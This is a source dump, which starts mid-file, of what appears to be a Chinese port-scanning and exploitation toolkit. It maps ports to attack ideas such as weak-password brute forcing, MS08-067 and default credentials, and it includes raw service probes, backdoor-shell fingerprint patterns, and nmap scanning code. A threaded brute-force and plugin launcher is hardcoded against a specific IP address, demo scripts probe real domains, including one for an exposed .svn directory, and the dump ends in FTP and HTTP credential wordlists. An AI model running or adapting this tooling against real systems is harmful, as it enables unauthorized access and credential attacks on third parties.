'http://xxx:5984/_utils/', 'exp': '未授权访问'}, 176 | '445': {'name': 'SMB', 'detail': '', 'exp': '弱口令爆破,检测是否有ms_08067等溢出'}, 177 | '1025': {'name': '111', 'detail': '', 'exp': 'NFS'}, 178 | '2082': {'name': '', 'detail': '', 'exp': 'cpanel主机管理系统登陆 (国外用较多)'}, 179 | '2083': {'name': '', 'detail': '', 'exp': 'cpanel主机管理系统登陆 (国外用较多)'}, 180 | '2222': {'name': '', 'detail': '', 'exp': 'DA虚拟主机管理系统登陆 (国外用较多)'}, 181 | '2601': {'name': '', 'detail': '默认密码zebra', 'exp': 'zebra路由'}, 182 | '2604': {'name': '', 'detail': '默认密码zebra', 'exp': 'zebra路由'}, 183 | '3128': {'name': '', 'detail': 'squid', 'exp': '代理默认端口,如果没设置口令很可能就直接漫游内网了'}, 184 | '3311': {'name': '', 'detail': '', 'exp': 'kangle主机管理系统登陆'}, 185 | '3312': {'name': '', 'detail': '', 'exp': 'kangle主机管理系统登陆'}, 186 | '4440': {'name': '', 'detail': 'rundeck 弱口令:admin/admin', 'exp': '参考WooYun: 借用新浪某服务成功漫游新浪内网'}, 187 | '6082': {'name': '', 'detail': 'varnish', 188 | 'exp': '参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网'}, 189 | '7778': {'name': '', 'detail': 'Kloxo', 'exp': '主机控制面板登录'}, 190 | '8083': {'name': '', 'detail': 'Vestacp', 'exp': '主机管理系统 (国外用较多)'}, 191 | '8649': {'name': '', 'detail': 'ganglia', 'exp': ''}, 192 | '8888': {'name': '', 'detail': 'amh/LuManager', 'exp': '主机管理系统默认端口'}, 193 | '9000': {'name': '', 'detail': 'fcgi', 'exp': 'fcgi php执行'}, 194 | '50000': {'name': '', 'detail': 'SAP', 'exp': '命令执行'} 195 | } 196 | return ports_protocols 197 | 198 | # 探测 199 | def _probes(): 200 | PROBES = [ 201 | '\r\n\r\n', 202 | 'GET / HTTP/1.0\r\n\r\n', 203 | 'GET / \r\n\r\n', 204 | '\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08', 205 | '\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 206 | '\x03\0\0\x0b\x06\xe0\0\0\0\0\0', 207 | '\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0', 208 | '\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98', 209 | '\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0', 210 | '< NTP/1.2 >\n', 211 | '< NTP/1.1 >\n', 212 | '< NTP/1.0 >\n', 213 | '\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))', 214 | '\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00', 215 | '\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04', 216 | '\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f', 217 | '\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0' 218 | ] 219 | return PROBES 220 | 221 | # 服务名和正则规则 222 | def _service(): 223 | SIGNS = [ 224 | 'http|^HTTP.*', # ok 225 | 'ssh|SSH-2.0-OpenSSH.*', # ok 226 | 'ssh|SSH-1.0-OpenSSH.*', 227 | 'netbios|^\x79\x08.*BROWSE', 228 | 'netbios|^\x79\x08.\x00\x00\x00\x00', 229 | 'netbios|^\x05\x00\x0d\x03', 230 | 'netbios|^\x83\x00', 231 | 'netbios|^\x82\x00\x00\x00', 232 | 'netbios|\x83\x00\x00\x01\x8f', 233 | 'backdoor-fxsvc|^500 Not Loged in', 234 | 'backdoor-shell|GET: command', 235 | 'backdoor-shell|sh: GET:', 236 | 'bachdoor-shell|[a-z]*sh: .* command not found', 237 | 'backdoor-shell|^bash[$#]', 238 | 'backdoor-shell|^sh[$#]', 239 | 'backdoor-cmdshell|^Microsoft Windows .* Copyright .*>', 240 | 'db2|.*SQLDB2RA', # ok 45.114.117.56 241 | 'db2jds|^N\x00', 242 | 'dell-openmanage|^\x4e\x00\x0d', 243 | 'finger|^\r\n Line User', 244 | 'finger|Line User', 245 | 'finger|Login name: ', 246 | 'finger|Login.*Name.*TTY.*Idle', 247 | 'finger|^No one logged on', 248 | 'finger|^\r\nWelcome', 249 | 'finger|^finger:', 250 | 'finger|^must provide username', 251 | 'finger|finger: GET: ', 252 | 'ftp|^220.*\n331', # ok 45.114.117.43 253 | 'ftp|^220.*\n530', 254 | 'ftp|^220.*FTP', 255 | 'ftp|^220 .* Microsoft .* FTP', 256 | 'ftp|^220 Inactivity timer', 257 | 'ftp|^220 .* UserGate', 258 | 'http|^HTTP/0.', 259 | 'http|^HTTP/1.', 260 | 'http|.*', 261 | 'http|.*', 262 | 'http|.*', 263 | 'http|Bad Request .Invalid URL.', 272 | 'http-jserv|^HTTP/.*Cookie.*JServSessionId', 273 | 'http-tomcat|^HTTP/.*Cookie.*JSESSIONID', 274 | 'http-weblogic|^HTTP/.*Cookie.*WebLogicSession', 275 | 'http-vnc|^HTTP/.*VNC desktop', 276 | 'http-vnc|^HTTP/.*RealVNC/', 277 | 'ldap|^\x30\x0c\x02\x01\x01\x61', # 沒探測出來,45.114.118.238,45.114.118.247 278 | 'ldap|^\x30\x32\x02\x01', 279 | 'ldap|^\x30\x33\x02\x01', 280 | 'ldap|^\x30\x38\x02\x01', 281 | 'ldap|^\x30\x84', 282 | 'ldap|^\x30\x45', 283 | 'smb|^\0\0\0.\xffSMBr\0\0\0\0.*', 284 | 'rdp|^\x03\x00\x00\x13', # 沒探測出來 285 | 'msrdp|^\x03\x00\x00\x0b', 286 | 'msrdp|^\x03\x00\x00\x11', 287 | 'msrdp|^\x03\0\0\x0b\x06\xd0\0\0\x12.\0$', 288 | 'msrdp|^\x03\0\0\x17\x08\x02\0\0Z~\0\x0b\x05\x05@\x06\0\x08\x91J\0\x02X$', 289 | 'msrdp|^\x03\0\0\x11\x08\x02..}\x08\x03\0\0\xdf\x14\x01\x01$', 290 | 'msrdp|^\x03\0\0\x0b\x06\xd0\0\0\x03.\0$', 291 | 'msrdp|^\x03\0\0\x0b\x06\xd0\0\0\0\0\0', 292 | 'msrdp|^\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n$', 293 | 'msrdp|^\x03\0\0\x0b\x06\xd0\0\x004\x12\0', 294 | 'msrdp-proxy|^nmproxy: Procotol byte is not 8\n$', 295 | 'msrpc|^\x05\x00\x0d\x03\x10\x00\x00\x00\x18\x00\x00\x00\x00\x00', 296 | 'msrpc|\x05\0\r\x03\x10\0\0\0\x18\0\0\0....\x04\0\x01\x05\0\0\0\0$', 297 | 'mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.*', 298 | 'mssql|^\x05\x6e\x00', # 沒探測出來 299 | 'mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*', 300 | 'mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.*', 301 | 'mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*', 302 | 'mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.*', 303 | 'mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.*', 304 | 'mssql|^\x04\x01\x00\x25\x00\x00\x01.*', 305 | 'telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.*', # 沒探測出來 306 | 'mssql|;MSSQLSERVER;', 307 | 'mysql|^\x19\x00\x00\x00\x0a', 308 | 'mysql|^\x2c\x00\x00\x00\x0a', 309 | 'mysql|hhost \'', 310 | 'mysql|khost \'', 311 | 'mysql|mysqladmin', 312 | 'mysql|whost \'', 313 | 'mysql-blocked|^\(\x00\x00', 314 | 'mysql-secured|this MySQL', 315 | 'mysql|mysql', # # ok 316 | 'mongodb|^.*version.....([\.\d]+)', # ok 45.114.126.4,為啥是21端口? 317 | 'nagiosd|Sorry, you \(.*are not among the allowed hosts...', 318 | 'nessus|< NTP 1.2 >\x0aUser:', 319 | 'oracle-tns-listener|\(ERROR_STACK=\(ERROR=\(CODE=', 320 | 'oracle-tns-listener|\(ADDRESS=\(PROTOCOL=', 321 | 'oracle-dbsnmp|^\x00\x0c\x00\x00\x04\x00\x00\x00\x00', 322 | 'oracle-https|^220- ora', 323 | 'oracle-rmi|\x00\x00\x00\x76\x49\x6e\x76\x61', 324 | 'oracle-rmi|^\x4e\x00\x09', 325 | 'postgres|Invalid packet length', # 沒探測出來 326 | 'postgres|^EFATAL', 327 | 'rlogin|login: ', # 沒探測出來 328 | 'rlogin|rlogind: ', 329 | 'rlogin|^\x01\x50\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x20\x64\x65\x6e\x69\x65\x64\x2e\x0a', 330 | 'rpc-nfs|^\x02\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00', 331 | 'rpc|\x01\x86\xa0', 332 | 'rpc|\x03\x9b\x65\x42\x00\x00\x00\x01', 333 | 'rpc|^\x80\x00\x00', 334 | 'rsync|^@RSYNCD:.*', # 沒探測出來 335 | 'smux|^\x41\x01\x02\x00', 336 | 'snmp-public|\x70\x75\x62\x6c\x69\x63\xa2', 337 | 'snmp|\x41\x01\x02', 338 | 'socks|^\x05[\x00-\x08]\x00', 339 | 'ssh|^SSH-', 340 | 'ssh|^SSH-.*openssh', # ok 45.114.117.200 2222端口 341 | 'ssl|\x15\x03\x01\x00\x02\x02', 342 | 'ssl|^..\x04\0.\0\x02', 343 | 'ssl|^\x16\x03\x01..\x02...\x03\x01', # ok 45.114.117.145 344 | 'ssl|^\x16\x03\0..\x02...\x03\0', 345 | 'ssl|SSL.*GET_CLIENT_HELLO', 346 | 'ssl|-ERR .*tls_start_servertls', 347 | 'ssl|^\x16\x03\0\0J\x02\0\0F\x03\0', 348 | 'ssl|^\x16\x03\0..\x02\0\0F\x03\0', 349 | 'ssl|^\x15\x03\0\0\x02\x02\.*', 350 | 'ssl|^\x16\x03\x01..\x02...\x03\x01', 351 | 'ssl|^\x16\x03\0..\x02...\x03\0', 352 | 'sybase|^\x04\x01\x00', # 沒探測出來 353 | 'telnet|^\xff\xfd', 354 | 'telnet|Telnet is disabled now', 355 | 'telnet|^\xff\xfe', 356 | 'tftp|^\x00[\x03\x05]\x00', 357 | 'http-tomcat|.*Servlet-Engine', 358 | 'uucp|^login: password: ', 359 | 'vnc|^RFB.*', # ok 45.114.118.23 360 | 'webmin|.*MiniServ', # ok 45.114.117.131 361 | 'webmin|^0\.0\.0\.0:.*:[0-9]', 362 | 'websphere-javaw|^\x15\x00\x00\x00\x02\x02\x0a'] # 沒探測出來 363 | serviceList = [] 364 | for item in SIGNS: 365 | (label, pattern) = item.split('|', 2) 366 | sign = (label, pattern) 367 | serviceList.append(sign) 368 | return serviceList 369 | 370 | # 添加密码文件目录到环境变量 371 | def setPwdSys(): 372 | import sys 373 | sys.path.append('PwdTxt') 374 | 375 | # 各个服务对应的管理员用户名,比如mysql的root,mssql的sa 376 | def serviceAdmin(): 377 | service_admin = { 378 | 'mysql': 'root', 379 | 'mssql': 'sa' 380 | 381 | 382 | } 383 | return service_admin 384 | 385 | 386 | -------------------------------------------------------------------------------- /Libs/methods.py: -------------------------------------------------------------------------------- 1 | #-*- coding:utf-8 -*- 2 | from Libs.glo import * 3 | logger = get_value('logger') 4 | 5 | class Cidr: 6 | def __init__(self, ips): 7 | self.ips = ips 8 | 9 | def bin2ip(self, b): 10 | ip = "" 11 | for i in range(0, len(b), 8): 12 | ip += str(int(b[i:i + 8], 2)) + "." 13 | return ip[:-1] 14 | 15 | # convert a decimal number to binary representation 16 | # if d is specified, left-pad the binary number with 0s to that length 17 | def dec2bin(self, n, d=None): 18 | s = "" 19 | while n > 0: 20 | if n & 1: 21 | s = "1" + s 22 | else: 23 | s = "0" + s 24 | n >>= 1 25 | if d is not None: 26 | while len(s) < d: 27 | s = "0" + s 28 | if s == "": s = "0" 29 | return s 30 | 31 | # convert an IP address from its dotted-quad format to its 32 | # 32 binary digit representation 33 | def ip2bin(self, ip): 34 | b = "" 35 | inQuads = ip.split(".") 36 | outQuads = 4 37 | for q in inQuads: 38 | if q != "": 39 | b += self.dec2bin(int(q), 8) 40 | outQuads -= 1 41 | while outQuads > 0: 42 | b += "00000000" 43 | outQuads -= 1 44 | return b 45 | 46 | def listCIDR(self): 47 | cidrlist = [] 48 | parts = self.ips.split("/") 49 | baseIP = self.ip2bin(parts[0]) 50 | subnet = int(parts[1]) 51 | # Python string-slicing weirdness: 52 | # "myString"[:-1] -> "myStrin" but "myString"[:0] -> "" 53 | # if a subnet of 32 was specified simply print the single IP 54 | if subnet == 32: 55 | print(self.bin2ip(baseIP)) 56 | # for any other size subnet, print a list of IP addresses by concatenating 57 | # the prefix with each of the suffixes in the subnet 58 | else: 59 | ipPrefix = baseIP[:-(32 - subnet)] 60 | for i in range(2 ** (32 - subnet)): 61 | cidrlist.append(self.bin2ip(ipPrefix + self.dec2bin(i, (32 - subnet)))) 62 | return cidrlist 63 | 64 | def filesParse(): 65 | filesPath = get_value('filesPath') 66 | q_ip = getQueue() 67 | with open(filesPath, 'rt') as f: 68 | for each in f.readlines(): 69 | q_ip.put(each.strip()) 70 | set_value('q_ip', q_ip) 71 | 72 | 73 | # 获取一个队列 74 | def getQueue(): 75 | from queue import Queue 76 | q = Queue(-1) 77 | return q 78 | 79 | # 复制队列 80 | def copyQueue(q): 81 | from queue import Queue 82 | q2 = Queue(-1) 83 | L = [] 84 | while not q.empty(): 85 | L.append(q.get()) 86 | for each in L: 87 | q.put(each) 88 | q2.put(each) 89 | return q2 90 | 91 | 92 | 93 | 94 | # 将扫描端口结束后的IP存放到队列里 从{'123.125.115.109': ['80'], '123.125.115.110': ['80'], '123.125.115.111': ['80']}字典里获取IP 95 | def probeServiceIpQueue(): 96 | ipOpenPort = get_value('ipOpenPort') 97 | from queue import Queue 98 | q = Queue(-1) 99 | for _ in ipOpenPort.keys(): 100 | q.put(_) 101 | return q 102 | 103 | 104 | # 处理端口扫描的逻辑 105 | def portParse(): 106 | port = get_value('port') # port:输入的端口命令,-p all ,-p 80,81,82 , -p 1-1024 107 | if port == 'all': 108 | ports_protocols = get_value('ports_protocols') 109 | ports = list(ports_protocols.keys()) 110 | elif ',' in port: 111 | ports = port.split(',') # ['80', '81', '82'] 112 | elif '-' in port: 113 | ports = list( 114 | map(lambda x: str(x), range(int(port.split('-')[0]), int(port.split('-')[1]) + 1))) # ['80', '81', '82'] 115 | else: 116 | ports = [port] 117 | 118 | set_value('ports', ports) # 将端口号存入全局变量里 119 | 120 | 121 | # 检查服务是否可被爆破,可被爆破返回服务名字和密码字典名字,不可被爆破返回None 122 | def checkBrustService(__service): 123 | pwdTxtsName = get_value('pwdTxtsName') 124 | for pwdTxtName in pwdTxtsName: 125 | if __service in pwdTxtName: 126 | return pwdTxtName 127 | return None 128 | 129 | # 打开密码本,将密码存入全局变量里 130 | def setGloPwdContent(pwdTXT): 131 | if not exist_key(pwdTXT): # 如果密码本已经读取过一次内容就不再读取 132 | pwdContent = getQueue() # 存放字典的队列 133 | with open('password/{}'.format(pwdTXT), 'rt') as f: 134 | for each in f.readlines(): 135 | pwdContent.put(each.strip()) 136 | set_value(pwdTXT, pwdContent) # {'mysql.txt': ['111', '111', '1111']} 137 | else: 138 | pass 139 | # logger.info('全局变量已经存在{}'.format(pwdTxtName)) 140 | 141 | 142 | # 多线程爆破端口 143 | def burstPortThread(Exp, ip, port, pwdTXT): 144 | threadNum = get_value('threadNum') 145 | q_pwd = get_value(pwdTXT) 146 | q_pwdCopy = copyQueue(q_pwd) # 赋值密码队列 147 | threads = [] 148 | for num in range(1, threadNum + 1): 149 | t = Exp(ip, port, q_pwdCopy) 150 | t.start() 151 | threads.append(t) 152 | for t in threads: 153 | t.join() 154 | 155 | 156 | def attackMultiThread(): 157 | from Libs.plugins import pluginInit 158 | # nmapResult = get_value('nmapResult') 159 | getcwd = get_value('getcwd') 160 | #print(nmapResult) 161 | # nmapResult = [{'127.0.0.1': {'3306': 'mysql', '80': 'http', '443': 'http'}}, {'127.0.0.2': {'3306': 'mysql', '80': 'http', '443': 'http'}}] 162 | nmapResult = [{'103.78.141.122': {'80': 'http', '1433': 'ms-sql-s', '3389': 'ms-wbt-server'}}] # , '3389': 'ms-wbt-server' 163 | for each_ip in nmapResult: 164 | for ip in each_ip: 165 | ip = ip 166 | ports = each_ip[ip].keys() 167 | for port in ports: 168 | service = each_ip[ip][port] 169 | init = pluginInit(service) # 初始化插件文件, 添加环境变量 170 | plugins = init.plugins # 获取插件 171 | pwdTXT = service + '.txt' # mysql.txt mssql.txt 172 | if init.pwdExist(pwdTXT): # 如果password目录有该密码本,返回True,否则返回None. 173 | setGloPwdContent(pwdTXT) # 读取密码内容存到全局变量里 174 | # logger.info(get_value(pwdTXT)) 175 | if plugins: 176 | for plugin in plugins: # 遍历插件 177 | if init.pluginExist(plugin): 178 | md = init.launch(plugin) 179 | if hasattr(md, 'Exploit'): 180 | Exp = getattr(md, 'Exploit') 181 | if 'brust' in plugin: # 爆破 182 | burstPortThread(Exp, ip, int(port), pwdTXT) 183 | else: # 调用插件 184 | Exp(ip, int(port)).launch() 185 | -------------------------------------------------------------------------------- /Libs/nmapPortScan.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import nmap 3 | from Libs.glo import * 4 | logger = get_value('logger') # 日志 5 | class portScanByNmap(): 6 | def __init__(self): 7 | self.Host = get_value('Host') 8 | self.Port = get_value('Port') 9 | self.nmapResult = [] 10 | logger.info("[*] PortScan By Nmap: ") 11 | 12 | def scan(self): 13 | nmScan = nmap.PortScanner() 14 | nmScan.scan(self.Host, self.Port) 15 | 16 | # 对所有host进行扫描 17 | for host in nmScan.all_hosts(): 18 | logger.info("Scanning {host}...".format(host=host)) 19 | ret = {host: {}} 20 | 21 | if not nmScan[host].get("tcp", None): continue 22 | tcps = nmScan[host]['tcp'] 23 | 24 | for port in tcps.keys(): 25 | if tcps[port].get("state", None) == "open": 26 | ret[host][str(port)] = tcps[port]["name"] 27 | logger.info("\t[*] {host} port {port} is open \t Service is {name}".format(host=host, port=port, 28 | name=tcps[port]["name"])) 29 | self.nmapResult.append(ret) 30 | set_value('nmapResult', self.nmapResult) 31 | 32 | 33 | -------------------------------------------------------------------------------- /Libs/plugins.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import sys 3 | import os 4 | from Libs.glo import * 5 | 6 | getcwd = get_value('getcwd') 7 | logger = get_value('logger') 8 | if sys.version[0] == "2": 9 | from urlparse import urlparse 10 | else: 11 | from urllib.parse import urlparse 12 | 13 | class pluginInit(): 14 | def __init__(self, service): 15 | self.service = service 16 | self.pluginpath = getcwd + r'/Exp/' + self.service 17 | # 添加环境变量 18 | sys.path.append(self.pluginpath) 19 | self.plugins = self.pluginAll() 20 | self.pwdTxts = get_value('pwdTxts') 21 | # print(self.pluginpath) 22 | # print("Add enviroment path into the System.") 23 | 24 | # 列出所有插件 25 | def pluginAll(self): 26 | try: 27 | pp = filter(lambda x: (True, False)[x[-2:] != "py" or '__init__' in x], os.listdir(self.pluginpath)) 28 | return [p[:-3] for p in pp] 29 | except Exception as e: 30 | logger.error('not [{}] plugins. [error] : {}'.format(self.service, e)) 31 | 32 | # 判断插件是否存在 33 | def pluginExist(self, pluginName): 34 | return pluginName in self.plugins 35 | 36 | # 判断服务密码是否存在 37 | def pwdExist(self, service): 38 | if service in self.pwdTxts: 39 | return True 40 | else: 41 | return False 42 | 43 | def launch(self, pluginName): 44 | logger.info("[*] Launch Plugin: " + pluginName) 45 | return __import__(pluginName) 46 | 47 | # class urlParse(): 48 | # @staticmethod 49 | # def isHttp(host): 50 | # h = urlparse(host) 51 | # if h.scheme == 'http' or h.scheme == 'https': 52 | # return True 53 | # 54 | # @staticmethod 55 | # def removeHttp(host): 56 | # if urlParse.isHttp(host): return urlparse(host).netloc 57 | # else: return urlparse(host).path 58 | # 59 | # @staticmethod 60 | # def addHttp(host): 61 | # if not urlParse.isHttp(host): 62 | # return "http://{}".format(urlParse.removeHttp(host)) -------------------------------------------------------------------------------- /Libs/rules.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | RULERS = { 4 | 80: { 5 | "withHttp": True 6 | }, 7 | 8 | 25: { 9 | "withHttp": False 10 | } 11 | } -------------------------------------------------------------------------------- /__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/__init__.py -------------------------------------------------------------------------------- /demo.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | import nmap 3 | import time 4 | 5 | # def main(): 6 | # parser = optparse.OptionParser('usage %prog -H -p ') 7 | # parser.add_option('-H', dest='tgtHost', type='string', help='specify target host') 8 | # parser.add_option('-p', dest='tgtPort', type='string', help='specify target port') 9 | # 10 | # (options, args) = parser.parse_args() 11 | # tgtHost = options.tgtHost 12 | # tgtPort = options.tgtPort 13 | # args.append(tgtPort) 14 | # if (tgtHost is None) | (tgtPort is None): 15 | # print('You must specify a target host and port[s]!') 16 | # exit(0) 17 | # for tgport in args: 18 | # nmapScan(tgtHost, tgport) 19 | 20 | def nmapScan(tgtHost, tgtPort): 21 | nmScan = nmap.PortScanner() 22 | nmScan.scan(tgtHost, tgtPort) 23 | print('dir(nmScan): {}'.format(dir(nmScan))) 24 | # 'all_hosts', 'analyse_nmap_xml_scan', 'command_line', 'csv', 'get_nmap_last_output', 'has_host', 'listscan', 'nmap_version', 'scan', 'scaninfo', 'scanstats'] 25 | print('all_hosts : {}'.format(nmScan.all_hosts())) 26 | print('analyse_nmap_xml_scan : {}'.format(nmScan.analyse_nmap_xml_scan())) 27 | # print('command_line : {}'.format(nmScan.command_line())) 28 | print('csv : {}'.format(nmScan.csv())) 29 | # print('get_nmap_last_output : {}'.format(nmScan.get_nmap_last_output())) 30 | # print('has_host : {}'.format(nmScan.has_host)) 31 | # print('listscan : {}'.format(nmScan.listscan())) 32 | # print('nmap_version : {}'.format(nmScan.nmap_version())) 33 | # # print('scan : {}'.format(nmScan.scan())) 34 | # print('scaninfo : {}'.format(nmScan.scaninfo())) 35 | # print('scanstats : {}'.format(nmScan.scanstats())) 36 | 37 | 38 | if __name__ == '__main__': 39 | start = time.time() 40 | nmapScan('www.chengyin.org', '80') 41 | end = time.time() 42 | print(end- start) 43 | 44 | # 测试命令: 45 | # python python-nmap.py -H 192.168.11.1 -p 80 21 23 443 445 -------------------------------------------------------------------------------- /demo2.py: -------------------------------------------------------------------------------- 1 | import requests 2 | url = 'https://www.ttrar.com/.svn/entries' 3 | res = requests.get(url, timeout=10) 4 | contentType = res.headers['Content-Type'] 5 | print(contentType) -------------------------------------------------------------------------------- /logger.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/logger.txt -------------------------------------------------------------------------------- /password/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/password/__init__.py -------------------------------------------------------------------------------- /password/ftp.txt: -------------------------------------------------------------------------------- 1 | ftp:ftp@163.com 2 | ftp:ftp 3 | ftp:1 4 | ftp:12 5 | ftp:123 6 | ftp:1234 7 | ftp:12345 8 | ftp:123456 9 | ftp:1234567 10 | ftp:12345678 11 | ftp:123456789 12 | ftp:1234567890 13 | ftp:654321 14 | ftp:54321 15 | ftp:00000000 16 | ftp:88888888 17 | ftp:pass 18 | ftp:password 19 | ftp:passwd 20 | ftp:!@#$%^ 21 | ftp:1q2w3e 22 | ftp:qawsed 23 | ftp:pwd 24 | ftp:1qaz2ws3e4 25 | ftp:qazwsxedc 26 | ftp:!@#$%^&* 27 | ftp:ftp21 28 | ftp:ftppass 29 | ftp:ftp221 30 | ftp:ftppassword 31 | ftp:ftppasswd 32 | admin:1 33 | admin:12 34 | admin:admin 35 | admin:123 36 | admin:1234 37 | admin:12345 38 | admin:123456 39 | admin:1234567 40 | admin:12345678 41 | admin:123456789 42 | admin:1234567890 43 | admin:654321 44 | admin:54321 45 | admin:00000000 46 | admin:88888888 47 | admin:pass 48 | admin:password 49 | admin:passwd 50 | admin:!@#$%^ 51 | admin:1q2w3e 52 | admin:qawsed 53 | admin:pwd 54 | admin:1qaz2ws3e4 55 | admin:qazwsxedc 56 | admin:!@#$%^&* 57 | admin:rootpass 58 | admin:rootpassword 59 | admin:rootpasswd 60 | test:1 61 | test:12 62 | test:123 63 | test:1234 64 | test:12345 65 | test:123456 66 | test:1234567 67 | test:12345678 68 | test:123123 69 | test:123456789 70 | test:test 71 | test:654321 72 | test:54321 -------------------------------------------------------------------------------- /password/http.txt: -------------------------------------------------------------------------------- 1 | cisco:1 2 | cisco:12 3 | cisco:cisco 4 | cisco:123 5 | cisco:1234 6 | cisco:12345 7 | cisco:123456 8 | cisco:1234567 9 | cisco:12345678 10 | cisco:123456789 11 | cisco:1234567890 12 | cisco:654321 13 | cisco:54321 14 | cisco:00000000 15 | cisco:88888888 16 | cisco:pass 17 | cisco:password 18 